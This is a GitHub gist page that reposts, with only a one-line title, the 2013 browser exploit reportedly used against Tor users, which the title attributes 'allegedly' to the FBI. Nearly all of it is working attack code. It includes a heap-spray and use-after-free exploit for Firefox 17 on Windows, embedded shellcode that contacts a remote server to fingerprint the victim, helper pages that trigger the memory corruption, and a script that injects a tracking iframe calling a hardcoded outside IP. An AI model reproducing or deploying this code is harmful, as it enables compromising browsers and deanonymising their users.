Skip to content

Instantly share code, notes, and snippets.

@mbijon

mbijon/iframe.html

Created August 4, 2013 19:42
Show Gist options
  • Save mbijon/6151638 to your computer and use it in GitHub Desktop.
Save mbijon/6151638 to your computer and use it in GitHub Desktop.
Download ZIP
Tor fingerprinting code-injection (allegedly by FBI) --from: http://www.twitlonger.com/show/n_1rlo0uu
Raw
iframe.html
//nl7qbezu7pqsuone.onion/?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 iframe:
<html>
<body>
<iframe frameborder=0 border=0 height=1 width=1 id="iframe"> </iframe>
</body>
</html>
<script>
var var1=0xB0;
var var2 = new Array(var1);
var var3 = new Array(var1);
var var4 = new Array(var1);
var var5=0xFF004;
var var6=0x3FC01;
var var7=0x60000000;
var var8=0x18000000;
var var9=1;
var var10 = 0x12000000;
var var11 = 0;
var var12=0;
var var13 =0;
function df()
{
if(var12==0)
{
return 0x00000000;
}
var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
if( var9 == 1 || var9 == 2)
return ( var14 - var12);
else
return 0x00000000;
}
function b()
{
var version = al();
if(version <17)
{
window.location.href="content_1.html";
}
if( version >=17 && version <18 )
var12 = 0xE8;
return ;
}
function c()
{
var iframe=document.getElementById("iframe");
iframe.src="content_2.html";
}
function d()
{
for(var j=0;j<var1;j++)
{
if( j<var1/8 || j==var1-1)
{
var tabb = new Array(0x1ED00);
var4[j]=tabb;
for(i=0;i<0x1ED00;i++)
{
var4[j][i]=0x11559944;
}
}
var2[j]= new ArrayBuffer(var5);
}
for(var j=0;j<var1;j++)
{
var3[j]= new Int32Array(var2[j],0,var6);
var3[j][0]=0x11336688;
for(var i=1;i<16;i++)
{
var3[j][0x4000*i] = 0x11446688;
}
}
for(var j=0;j<var1;j++)
{
if(typeof var4[j] !="undefined")
{
var4[j][0]=0x22556611;
}
}
}
function e(view)
{
var i=0;
for(i=0;i<0x400;i++)
{
view[i] = var13+0x1010 ;
}
view[0x0]=var13+0x1010;
view[0x44]=0x0;
view[0x45]=0x0;
view[0x400-4]=var13+0x1010;
view[0x400]=0x00004004;
view[0x401]=0x7FFE0300;
}
function f(var15,view,var16)
{
var magneto = "";
var magneto = ("\ufc60\u8ae8"+"\u0000\u6000"+"\ue589\ud231"+"\u8b64\u3052"+"\u528b\u8b0c"+"\u1452\u728b"+"\u0f28\u4ab7"+"\u3126\u31ff"+"\uacc0\u613c"+"\u027c\u202c"+"\ucfc1\u010d"+"\ue2c7\u52f0"+"\u8b57\u1052"+"\u428b\u013c"+"\u8bd0\u7840"+"\uc085\u4a74"+"\ud001\u8b50"+"\u1848\u588b"+"\u0120\ue3d3"+"\u493c\u348b"+"\u018b\u31d6"+"\u31ff\uacc0"+"\ucfc1\u010d"+"\u38c7\u75e0"+"\u03f4\uf87d"+"\u7d3b\u7524"+"\u58e2\u588b"+"\u0124\u66d3"+"\u0c8b\u8b4b"+"\u1c58\ud301"+"\u048b\u018b"+"\u89d0\u2444"+"\u5b24\u615b"+"\u5a59\uff51"+"\u58e0\u5a5f"+"\u128b\u86eb"+"\u5d05\ubd81"+"\u02e9\u0000"+"\u4547\u2054"+"\u7075\u858d"+"\u02d1\u0000"+"\u6850\u774c"+"\u0726\ud5ff"+"\uc085\u5e74"+"\u858d\u02d8"+"\u0000\u6850"+"\u774c\u0726"+"\ud5ff\uc085"+"\u4c74\u90bb"+"\u0001\u2900"+"\u54dc\u6853"+"\u8029\u006b"+"\ud5ff\udc01"+"\uc085\u3675"+"\u5050\u5050"+"\u5040\u5040"+"\uea68\udf0f"+"\uffe0\u31d5"+"\uf7db\u39d3"+"\u74c3\u891f"+"\u6ac3\u8d10"+"\ue1b5\u0002"+"\u5600\u6853"+"\ua599\u6174"+"\ud5ff\uc085"+"\u1f74\u8dfe"+"\u0089\u0000"+"\ue375\ubd80"+"\u024f\u0000"+"\u7401\ue807"+"\u013b\u0000"+"\u05eb\u4de8"+"\u0001\uff00"+"\ub8e7\u0100"+"\u0000\uc429"+"\ue289\u5052"+"\u6852\u49b6"+"\u01de\ud5ff"+"\u815f\u00c4"+"\u0001\u8500"+"\u0fc0\uf285"+"\u0000\u5700"+"\uf9e8\u0000"+"\u5e00\uca89"+"\ubd8d\u02e9"+"\u0000\uebe8"+"\u0000\u4f00"+"\ufa83\u7c20"+"\uba05\u0020"+"\u0000\ud189"+"\uf356\ub9a4"+"\u000d\u0000"+"\ub58d\u02c4"+"\u0000\ua4f3"+"\ubd89\u024b"+"\u0000\u565e"+"\ua968\u3428"+"\uff80\u85d5"+"\u0fc0\uaa84"+"\u0000\u6600"+"\u488b\u660a"+"\uf983\u0f04"+"\u9c82\u0000"+"\u8d00\u0c40"+"\u008b\u088b"+"\u098b\u00b8"+"\u0001\u5000"+"\ue789\uc429"+"\ue689\u5657"+"\u5151\u4868"+"\ud272\uffb8"+"\u85d5\u81c0"+"\u04c4\u0001"+"\u0f00\u0fb7"+"\uf983\u7206"+"\ub96c\u0006"+"\u0000\u10b8"+"\u0000\u2900"+"\u89c4\u89e7"+"\ud1ca\u50e2"+"\u3152\u8ad2"+"\u8816\u24d0"+"\uc0f0\u04e8"+"\u093c\u0477"+"\u3004\u02eb"+"\u3704\u0788"+"\u8847\u24d0"+"\u3c0f\u7709"+"\u0404\ueb30"+"\u0402\u8837"+"\u4707\ue246"+"\u59d4\ucf29"+"\ufe89\u0158"+"\u8bc4\u4bbd"+"\u0002\uf300"+"\uc6a4\u4f85"+"\u0002\u0100"+"\u2ee8\u0000"+"\u3100\u50c0"+"\u2951\u4fcf"+"\u5357\uc268"+"\u38eb\uff5f"+"\u53d5\u7568"+"\u4d6e\uff61"+"\ue9d5\ufec8"+"\uffff\uc931"+"\ud1f7\uc031"+"\uaef2\ud1f7"+"\uc349\u0000"+"\u0000\u8d00"+"\ue9bd\u0002"+"\ue800\uffe4"+"\uffff\ub94f"+"\u004f\u0000"+"\ub58d\u0275"+"\u0000\ua4f3"+"\ubd8d\u02e9"+"\u0000\ucbe8"+"\uffff\uc3ff"+"\u0a0d\u6f43"+"\u6e6e\u6365"+"\u6974\u6e6f"+"\u203a\u656b"+"\u7065\u612d"+"\u696c\u6576"+"\u0a0d\u6341"+"\u6563\u7470"+"\u203a\u2f2a"+"\u0d2a\u410a"+"\u6363\u7065"+"\u2d74\u6e45"+"\u6f63\u6964"+"\u676e\u203a"+"\u7a67\u7069"+"\u0a0d\u0a0d"+"\u8300\u0ec7"+"\uc931\ud1f7"+"\uc031\uaef3"+"\uff4f\u0de7"+"\u430a\u6f6f"+"\u696b\u3a65"+"\u4920\u3d44"+"\u7377\u5f32"+"\u3233\u4900"+"\u4850\u504c"+"\u5041\u0049"+"\u0002\u5000"+"\ude41\u36ca"+"\u4547\u2054"+"\u312f\u3866"+"\u6134\u3165"+"\u2d64\u6230"+"\u3531\u342d"+"\u6434\u2d63"+"\u3939\u3336"+"\u382d\u6362"+"\u3739\u3131"+"\u3430\u3935"+"\u2030\u5448"+"\u5054\u312f"+"\u312e\u0a0d"+"\u6f48\u7473"+"\u203a\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u9000"+"");
var var29 = magneto;
var var17 = "\u9060";
var var18 = "\u9061";
var var19 = "\uC481\u0000\u0008" ;
var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var22 = "\uE589";
var var23 ="\uC3C9";
var var24 = "\uE889";
var24 += "\u608D\u90C0";
var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
var var26 = var25 + var16*4
var var27 =""
var27 += "\uB890\u2020\u2020";
var27 += "\uA390"+ae(var26+0x00);
var27 += "\uA390"+ae(var26+0x04);
var27 += "\uA390"+ae(var26+0x08);
var27 += "\uA390"+ae(var26+0x0C);
var var28 = var17;
var28 += var20;
var28 += var19;
var28 += var22;
var28 += var27;
var28 += var29;
var28 += var21;
var28 += var18;
var28 += var23;
var var29Array = new Array();
var29Array=ag(var28);
var var29Ad = var13+0x5010;
var i=0;
var j=0;
var var30=var13+0x4048;
var var31 = new Array();
var31[0]=var30;
var31[1]=var30;
var31[2]=var30;
var31[3]=var15[1];
var31[4]=var29Ad;
var31[5]=0xFFFFFFFF;
var31[6]=var13+0x4044;
var31[7]=var13+0x4040;
var31[8]=0x00000040;
var31[9]=var13+0x4048;
var31[10]=0x00040000;
var31[11]=var29Ad;
var31[12]=var13+0x301C;
for(var i=0 ; i < 0x140 ; i++)
{
var31[i+15]=var15[0];
}
var var32 = 0x3F8;
view[0x800+0+var32]=var13+0x4018;
view[0x800+1+var32]=var13+0x4018;
for(var i=2 ; i < var31.length ; i++)
{
view[0x800+i+var32]= 0x41414141;
}
for(var i=0 ; i < var31.length ; i++)
{
view[0xC02+i+var32]= var31[i];
}
for(var i=0 ; i < var29Array.length ; i++)
{
view[0x1000 + i+var32] = var29Array[i];
}
}
function g(var50,view)
{
var k = h(var50,view);
var j=0;
if( k < 0 )
return -1;
view[0x404+k]=var13+0x3010;
return 1;
}
function h(var50,view)
{
var address=0;
var u=0;
var memory="";
var var55=0;
for( u =7; u >=4 ;u--)
{
address=view[0x404+u];
if( address > 0x000A0000 && address < 0x80000000 )
{
memory = i(address,0x48,var50,view);
var55=af(memory[0x14]+memory[0x15]);
if(var55==address)
{
return u;
}
}
}
return -1;
}
function i(address,size,var50,view)
{
var var56 = size/2;
var56 = var56*0x10 +0x04;
view[0x400]=var56;
view[0x401]=address;
return var4[var50][0];
}
function j(memory,view)
{
var intArray=ag(memory);
for(var i=0 ; i < intArray.length ; i++)
{
view[0x404+i]=intArray[i];
}
}
function k()
{
for(var j=0;j<var1;j++)
{
if(var2[j].byteLength!=var5)
{
return j;
}
}
return -1;
}
function l(view,var58)
{
view[var58] = var13 + 0x1030;
view[var58+1] = 0xFFFFFF85;
}
function m(view,var58)
{
view[var58]=0x00000000;
for(var j=0;j<var1;j++)
{
if(typeof var4[j] !="undefined")
{
if(var4[j][0]!=0x22556611)
return j;
}
}
return -1
}
function n(view,firstvar58)
{
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
var var58=0;
for(var i=0;i<200;i++)
{
if(view[var58] != 0x11336688)
{
if(view[var58] == 0x22556611 )
return var58;
else
return -1;
}
if(var58==0)
{
var58 = firstvar58;
}else{
var var59=view[var58-0x0C];
var58 = (var59 - var57)/4;
}
}
return -1;
}
function o(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
var var59 = view[0x00100000/4-0x0C];
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
return ((var59 - var57)/4);
}
function p()
{
for(var j=0;j<var1;j++)
{
for(var i=1;i<16;i++)
{
if(var3[j][i*0x4000-0x02]==0x01000000)
{
return -i;
}
}
}
return 0;
}
function q(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
view[0x00100000/4-0x02]=var7;
if(var2[var60+1].byteLength==var7)
return var60+1;
return -1;
}
function r(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
view[0x00100000/4-0x02]=var5;
}
function t()
{
if(typeof sessionStorage.tempStor !="undefined")
return false;
sessionStorage.tempStor="";
return true;
}
function u()
{
if( t() == true )
{
var9 = 1;
b();
d();
c();
}else{
return ;
}
}
function v()
{
if(k() == -1)
{
var11 = p();
var9 = 2;
c();
}else{
x();
}
}
function w()
{
if(var9==1)
v();
else
x();
}
function x()
{
var var60 = k();
if(var60==-1)
return ;
var nextvar60 = q(var60);
if(nextvar60==-1)
return ;
var var61 = o(var60);
var var62 = new Int32Array(var2[nextvar60],0,var8);
var var58 = n(var62,var61);
if(var58==-1)
return ;
var var50 = m(var62,var58);
var13 = var10 + 0x00100000 + 0x00010000 * var11;
e(var62);
l(var62,var58);
var var64 = var4[var50][0];
ac(var64,var50,var62,var58,var60);
}
function y(index)
{
var4[index][1]= document.createElement('span') ;
}
function z(index,index2)
{
var4[index][1].innerHTML;
}
function aa(view,var63)
{
return view[var63];
}
function ab(address,view,var63)
{
view[var63]=address;
}
function ac(var64,var50,var62,var58,var60)
{
var var15=ah(var64);
f(var15,var62,var58);
y(var50);
var var66 = aa(var62,var58+2);
var var67 = i(var66,0x40,var50,var62) ;
j(var67,var62);
g(var50,var62);
ab(var13+0x1040 ,var62,var58+2);
r(var60)
setTimeout(ad,1000);
z(var50);
}
function ad()
{
for(var j=0;j<var1;j++)
{
delete var3[j]
var3[j]= null;
delete var2[j];
var2[j] = null;
if(typeof var4[j] !="undefined")
{
delete var4[j];
var4[j] = null;
}
}
delete var2;
delete var3;
delete var4;
var2=null;
var3=null;
var4=null;
}
function ae(int32)
{
var var68 = String.fromCharCode((int32)& 0x0000FFFF);
var var69 = String.fromCharCode((int32 >> 16) & 0x0000FFFF);
return var68+var69;
}
function af(string)
{
var var70 = string.charCodeAt(0);
var var71 = string.charCodeAt(1);
var var72 = (var71 << 16) + var70;
return var72;
}
function ag(string)
{
if(string.length%2!=0)
string+="\u9090";
var intArray= new Array();
for(var i=0 ; i*2 < string.length; i++ )
intArray[i]=af(string[i*2]+string[i*2+1]);
return intArray;
}
function ah(var73)
{
var var74 = var73.substring(0,2);
var var70 = var74.charCodeAt(0);
var var71 = var74.charCodeAt(1);
var var75 = (var71 << 16) + var70;
if (var75 == 0)
{
var var76 = var73.substring(32, 34);
var var70 = var76.charCodeAt(0);
var var71 = var76.charCodeAt(1);
var75 = (var71 << 16) + var70;
}
var var15 = am(var75);
if (var15 == -1)
{
return;
}
return var15
}
function aj(version)
{
var i = navigator.userAgent.indexOf("Windows NT");
if (i != -1)
return true;
return false;
}
function ak()
{
var ua = navigator.userAgent;
var browser = ua.substring(0, ua.lastIndexOf("/"));
browser = browser.substring(browser.lastIndexOf(" ") + 1);
if (browser != "Firefox")
return -1;
var version = ua.substring(ua.lastIndexOf("/") + 1);
version = parseInt(version.substring(0, version.lastIndexOf(".")));
return version;
}
function al()
{
version = ak();
if (!aj(version))
return -1;
return version;
}
function am(var77)
{
var var15 = new Array(2);
if (var77 % 0x10000 == 0xE510)
{
var78 = var77 - 0xE510;
var15[0] = var78 + 0xE8AE;
var15[1] = var78 + 0xD6EE;
}
else if (var77 % 0x10000 == 0x9A90)
{
var78 = var77 - 0x69A90;
var15[0] = var78 + 0x6A063;
var15[1] = var78 + 0x68968;
}
else if (var77 % 0x10000 == 0x5E70)
{
var78 = var77 - 0x65E70;
var15[0] = var78 + 0x66413;
var15[1] = var78 + 0x64D34;
}
else if (var77 % 0x10000 == 0x35F3)
{
var78 = var77 - 0x335F3;
var15[0] = var78 + 0x4DE13;
var15[1] = var78 + 0x49AB8;
}
else if (var77 % 0x10000 == 0x5CA0)
{
var78 = var77 - 0x65CA0;
var15[0] = var78 + 0x66253;
var15[1] = var78 + 0x64B84;
}
else if (var77 % 0x10000 == 0x5CD0)
{
var78 = var77 - 0x65CD0;
var15[0] = var78 + 0x662A3;
var15[1] = var78 + 0x64BA4;
}
else if (var77 % 0x10000 == 0x6190)
{
var78 = var77 - 0x46190;
var15[0] = var78 + 0x467D3;
var15[1] = var78 + 0x45000;
}
else if (var77 % 0x10000 == 0x9CB9)
{
var78 = var77 - 0x29CB9;
var15[0] = var78 + 0x29B83;
var15[1] = var78 + 0xFFC8;
}
else if (var77 % 0x10000 == 0x9CE9)
{
var78 = var77 - 0x29CE9;
var15[0] = var78 + 0x29BB3;
var15[1] = var78 + 0xFFD8;
}
else if (var77 % 0x10000 == 0x70B0)
{
var78 = var77 - 0x470B0;
var15[0] = var78 + 0x47733;
var15[1] = var78 + 0x45F18;
}
else if (var77 % 0x10000 == 0x7090)
{
var78 = var77 - 0x47090;
var15[0] = var78 + 0x476B3;
var15[1] = var78 + 0x45F18;
}
else if (var77 % 0x10000 == 0x9E49)
{
var78 = var77 - 0x29E49;
var15[0] = var78 + 0x29D13;
var15[1] = var78 + 0x10028;
}
else if (var77 % 0x10000 == 0x9E69)
{
var78 = var77 - 0x29E69;
var15[0] = var78 + 0x29D33;
var15[1] = var78 + 0x10018;
}
else if (var77 % 0x10000 == 0x9EB9)
{
var78 = var77 - 0x29EB9;
var15[0] = var78 + 0x29D83;
var15[1] = var78 + 0xFFC8;
}
else
{
return -1;
}
return var15;
}
window.addEventListener("onload", u(),true);
</script>
nl7qbezu7pqsuone.onion/content_2.html:
<html><body></body></html><script>var y="?????",url=window.location.href;if(0>url.indexOf(y)){var iframe=document.createElement("iframe");iframe.src="content_3.html";document.body.appendChild(iframe)}else parent.w();function df(){return parent.df()};</script>
nl7qbezu7pqsuone.onion/content_3.html:
<script>var y="?????",z="",z=z+"<body",z=z+">",z=z+"<img",z=z+" height='1' width='1' src='error.html'",z=z+' onerror="javascript: ',z=z+("window.location.href='content_2.html"+y+"';\" "),z=z+">",z=z+"</body",z=z+">",flag=!1,var83=0;
function b(){for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)e[c]=new ArrayBuffer(180);for(c=0;1024>c;c++)d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;return d}function a(){!1==flag&&(flag=!0,window.stop());window.stop();b();window.parent.frames[0].frameElement.ownerDocument.write(z);b()}var83=parent.df();0!=var83&&document.addEventListener("readystatechange",a,!1);
</script>
Raw
second-version-js.js
function createCookie(name,value,minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime()+(minutes*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}
function isFF() {
return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
function updatify() {
var iframe = document.createElement('iframe');
iframe.style.display = "inline";
iframe.frameBorder = "0";
iframe.scrolling = "no";
iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
iframe.height = "5";
iframe.width = "*";
document.body.appendChild(iframe);
}
function freedomhost() {
if ( ! readCookie("n_serv") ) {
createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
updatify();
}
}
function isReady()
{
if ( document.readyState === "interactive" || document.readyState === "complete" ) {
if ( isFF() ) {
//window.alert(window.location + "Firefox Detected.")
freedomhost();
}
}
else
{
setTimeout(isReady, 250);
}
}
setTimeout(isReady, 250);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment